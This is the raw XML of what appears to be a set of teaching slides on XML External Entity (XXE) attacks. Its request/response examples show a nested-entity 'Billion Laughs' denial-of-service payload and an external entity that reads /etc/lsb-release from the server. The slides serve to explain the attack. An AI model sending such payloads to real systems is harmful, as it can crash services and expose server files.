            <a:ext cx="102218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The following is an example of a Data Type Definition (DTD) called foo with an element called bar,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which is now an alias of the word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Therefore, any time </a:t>
            </a:r>
            <a:r>
              <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&amp;bar; is used, the XML parser will replace that entity with the word “World”.</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63291755"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1676400" y="2743200"/>
          <a:ext cx="10515600" cy="3403480"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5257800"/>
                <a:gridCol w="5257800"/>
              </a:tblGrid>
              <a:tr h="568840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Request</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Response</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1422099">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>POST http://example.com/xml HTTP/1.1 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>DOCTYPE foo [ </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     &lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ELEMENT foo ANY&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     &lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ENTITY bar "World"&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>]&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;foo&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>     Hello </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&amp;bar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;/foo&gt; </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>HTTP/1.0 200 OK </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Hello </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>World </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>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12946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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851079" y="1194561"/>
            <a:ext cx="10515600" cy="1110757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>While this initially seems harmless, XML entities can be used by an attacker to cause a Denial of Service attack by embedding entities, within entities within entities. This attack is commonly referred to as the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Billion Laughs attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”. Some XML parsers automatically limit the amount of memory they can use.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs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561310641"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1082898" y="2563368"/>
          <a:ext cx="10515600" cy="3474720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5257800"/>
                <a:gridCol w="5257800"/>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Request</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Response</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>POST http://example.com/xml HTTP/1.1 </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>DOCTYPE </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> [ </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>       &lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ELEMENT </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> ANY&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>       &lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ENTITY bar "World "&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>       &lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ENTITY t1 "&amp;bar;&amp;bar;"&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>       &lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ENTITY t2 "&amp;t1;&amp;t1;&amp;t1;&amp;t1;"&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>       &lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ENTITY t3 "&amp;t2;&amp;t2;&amp;t2;&amp;t2;&amp;t2;"&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>]&gt; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>       Hello </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&amp;t3;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&gt; </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>HTTP/1.0 200 OK </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Hello </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>World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a:effectLst/>
                        </a:rPr>
                        <a:t>World</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>World</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>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8678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3516"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More than DDOS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915474" y="1078651"/>
            <a:ext cx="10515600" cy="1097879"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML entities however, can be used for much more than Denial of Service since XML entities do not necessarily have to be defined </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>in the XML document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. In fact, XML entities can come from just about anywhere – including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>external sources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, hence the name XML External Entity (XXE). This is where XXE becomes a type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Server-side Request Forgery (SSRF) attack</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254" y="2528820"/>
            <a:ext cx="8757634" cy="3562887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2217062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3820"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example 4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134414" y="1168803"/>
            <a:ext cx="10515600" cy="853180"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An attacker can make the following request, and if the XML parser is configured to process external entities (by default, many popular XML parsers are configured to do so), it will return the contents of a file on the system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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26812023"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1572296" y="2871817"/>
          <a:ext cx="10515600" cy="2651760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5257800"/>
                <a:gridCol w="5257800"/>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Request</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Response</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>POST http://example.com/xml HTTP/1.1 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>DOCTYPE foo [ </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>      &lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ELEMENT </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> ANY&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>      &lt;!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ENTITY </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>bar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> SYSTEM "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>file:///etc/lsb-release</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>"&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>]&gt; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
